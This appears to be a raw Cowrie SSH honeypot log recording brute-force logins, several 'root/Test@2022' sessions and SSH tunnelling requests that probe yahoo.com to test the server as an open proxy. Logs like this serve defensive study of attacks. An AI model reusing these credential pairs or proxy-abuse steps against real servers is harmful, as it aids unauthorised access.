{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.566009Z","src_ip":"213.209.150.239","session":"39db43c26a8c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21998,"dst_ip":"1.2.3.4","dst_port":22,"session":"c324fa84193a","protocol":"ssh","message":"New connection: 213.209.150.239:21998 (1.2.3.4:22) [session: c324fa84193a]","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.612068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.612684Z","src_ip":"213.209.150.239","session":"c324fa84193a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.659970Z","src_ip":"213.209.150.239","session":"c324fa84193a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.894850Z","src_ip":"213.209.150.239","session":"c324fa84193a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":29401,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:29401","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.942901Z","session":"c324fa84193a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.990008Z","src_ip":"213.209.150.239","session":"c324fa84193a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":40648,"dst_ip":"1.2.3.4","dst_port":22,"session":"baf0d6506f08","protocol":"ssh","message":"New connection: 27.112.78.170:40648 (1.2.3.4:22) [session: baf0d6506f08]","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.046474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.047325Z","src_ip":"27.112.78.170","session":"baf0d6506f08"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":4999,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4999","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.125524Z","session":"c324fa84193a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.172595Z","src_ip":"213.209.150.239","session":"c324fa84193a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.220385Z","src_ip":"213.209.150.239","session":"c324fa84193a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22036,"dst_ip":"1.2.3.4","dst_port":22,"session":"baf2cb69dcc3","protocol":"ssh","message":"New connection: 213.209.150.239:22036 (1.2.3.4:22) [session: baf2cb69dcc3]","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.266950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.267805Z","src_ip":"213.209.150.239","session":"baf2cb69dcc3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.315898Z","src_ip":"213.209.150.239","session":"baf2cb69dcc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.350999Z","src_ip":"27.112.78.170","session":"baf0d6506f08"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.550726Z","src_ip":"213.209.150.239","session":"baf2cb69dcc3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":7882,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7882","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.599226Z","session":"baf2cb69dcc3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.646600Z","src_ip":"213.209.150.239","session":"baf2cb69dcc3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3800,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3800","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.781740Z","session":"baf2cb69dcc3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.829624Z","src_ip":"213.209.150.239","session":"baf2cb69dcc3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.877896Z","src_ip":"213.209.150.239","session":"baf2cb69dcc3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22082,"dst_ip":"1.2.3.4","dst_port":22,"session":"d38c48f23c0e","protocol":"ssh","message":"New connection: 213.209.150.239:22082 (1.2.3.4:22) [session: d38c48f23c0e]","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.933455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.934249Z","src_ip":"213.209.150.239","session":"d38c48f23c0e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:15.990754Z","src_ip":"213.209.150.239","session":"d38c48f23c0e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.273414Z","src_ip":"213.209.150.239","session":"d38c48f23c0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":16388,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:16388","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.330940Z","session":"d38c48f23c0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.388002Z","src_ip":"213.209.150.239","session":"d38c48f23c0e"}
{"eventid":"cowrie.login.failed","username":"yuany","password":"yuany","message":"login attempt [yuany/yuany] failed","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.455144Z","src_ip":"27.112.78.170","session":"baf0d6506f08"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":9566,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9566","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.543004Z","session":"d38c48f23c0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.599770Z","src_ip":"213.209.150.239","session":"d38c48f23c0e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.657363Z","src_ip":"213.209.150.239","session":"d38c48f23c0e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22144,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6a37cbcf404","protocol":"ssh","message":"New connection: 213.209.150.239:22144 (1.2.3.4:22) [session: c6a37cbcf404]","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.703521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.704292Z","src_ip":"213.209.150.239","session":"c6a37cbcf404"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.751717Z","src_ip":"213.209.150.239","session":"c6a37cbcf404"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:16.987880Z","src_ip":"213.209.150.239","session":"c6a37cbcf404"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":16151,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16151","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.036004Z","session":"c6a37cbcf404"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.083341Z","src_ip":"213.209.150.239","session":"c6a37cbcf404"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":18763,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18763","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.221764Z","session":"c6a37cbcf404"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.269217Z","src_ip":"213.209.150.239","session":"c6a37cbcf404"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.316982Z","src_ip":"213.209.150.239","session":"c6a37cbcf404"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22185,"dst_ip":"1.2.3.4","dst_port":22,"session":"effa6239950f","protocol":"ssh","message":"New connection: 213.209.150.239:22185 (1.2.3.4:22) [session: effa6239950f]","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.363154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.364064Z","src_ip":"213.209.150.239","session":"effa6239950f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.411422Z","src_ip":"213.209.150.239","session":"effa6239950f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.460810Z","src_ip":"79.124.8.120","session":"47881ef4aee9"}
{"eventid":"cowrie.session.closed","duration":180.11441326141357,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.468750Z","src_ip":"79.124.8.120","session":"47881ef4aee9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.658987Z","src_ip":"213.209.150.239","session":"effa6239950f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":3554,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3554","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.707262Z","session":"effa6239950f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.735774Z","src_ip":"27.112.78.170","session":"baf0d6506f08"}
